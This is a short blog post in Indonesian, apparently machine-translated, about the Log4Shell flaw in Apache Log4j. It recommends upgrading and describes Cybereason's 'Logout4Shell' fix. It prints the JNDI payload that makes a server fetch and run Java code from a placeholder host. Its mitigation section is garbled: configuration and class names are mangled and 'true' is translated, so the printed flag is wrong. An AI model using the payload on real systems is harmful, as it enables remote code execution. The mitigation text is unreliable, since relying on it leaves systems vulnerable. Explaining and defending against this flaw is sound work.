Vaksin untuk bug Log4Shell
Jika Anda sedikit tertarik dengan keamanan komputer, pasti Anda akan menyadari bahwa kesalahan 0 hari yang memengaruhi Apache Log4j diumumkan pada tanggal 9 Desember. Dinamakan Log4Shell, bug ini mempengaruhi log4j dari versi 2.0 hingga 2.14.1 mencapai skor CVSS 10/10 dalam hal tingkat keparahan.
Woo hoo.
Ini umum di mana-mana, terutama karena bug sedang digunakan. Singkatnya, yang harus Anda lakukan adalah meneruskan karakter berikut dalam log yang dianalisis oleh log4j.
${jndi:ldap://URL.com/FICHIER_JAVA}dan itu akan memiliki efek mengunduh dan mengeksekusi file Java yaitu “URL.com/FICHIER_JAVA” di akhir url. Ini sesederhana itu dramatis.
Ada banyak literatur tentang ini khususnya di sisi CERT-FR jadi saya tidak akan menguraikan topiknya, tetapi proyek Github yang menarik dan menyenangkan telah muncul dari semua kekacauan ini.
Seperti yang Anda ketahui, sangat penting untuk memperbarui log4j ke versi> = 2.15.0 untuk memperbaiki kerentanan Log4Shell ini (CVE-2021-44228).
Dan jika ini tidak memungkinkan:
Untuk aplikasi yang menggunakan pustaka log4j versi 2.10.0 dan yang lebih baru, juga dimungkinkan untuk melindungi dari serangan apa pun dengan memodifikasi parameter konfigurasi log4j2.formatMsgNoOpsoeke ke nilai di mana, misalnya saat meluncurkan mesin virtual Java dengan opsi -Dlog4j2.formatMsgNoLookups = benar. Alternatif lain adalah menghapus kelas JndiOpsoek dalam parameter jalan kelas untuk menghilangkan vektor serangan utama (peneliti tidak mengecualikan keberadaan vektor serangan lain).
Tetapi kemungkinan lain adalah membiarkan alam mengambil jalannya dan itulah yang ditawarkan Cybereason dengan kode ini yang disebut Logout4Shell yang mengeksploitasi kerentanan Log4Shell untuk … cukup perbaiki.
Payload yang dimuat oleh kesalahan akan memaksa perekam Log4j untuk mengonfigurasi ulang dirinya sendiri untuk mengganti parameter yang berjalan dengan baik ke True dan oleh karena itu akan mencegah eksploitasi berikutnya oleh serangan ini.
Ini semacam vaksin dunia maya sambil menunggu pembaruan nyata dari Log4j.
Jika Anda tertarik, kodenya tersedia di Github.
Semoga sukses untuk mereka yang terkena dampak.
Untuk membaca juga:
“Friendly foodie. Stunningly charming explorer. Zombie nerd. Unrepentant web enthusiast. Crashes a lot.”